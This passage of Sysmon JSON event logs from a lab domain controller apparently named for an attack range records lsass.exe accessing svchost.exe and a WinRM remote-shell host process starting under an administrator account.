07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5507,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.065\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.065","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5508,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.065\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.065","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5509,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.065\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.065","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5510,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5511,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5512,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5513,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.240\r\nProcessGuid: {41C8662E-20D7-5F25-0000-0010DBE10800}\r\nProcessId: 2124\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.240","ProcessGuid":"{41C8662E-20D7-5F25-0000-0010DBE10800}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010C3650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5514,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-0010DBE10800}\r\nTargetProcessId: 2124\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 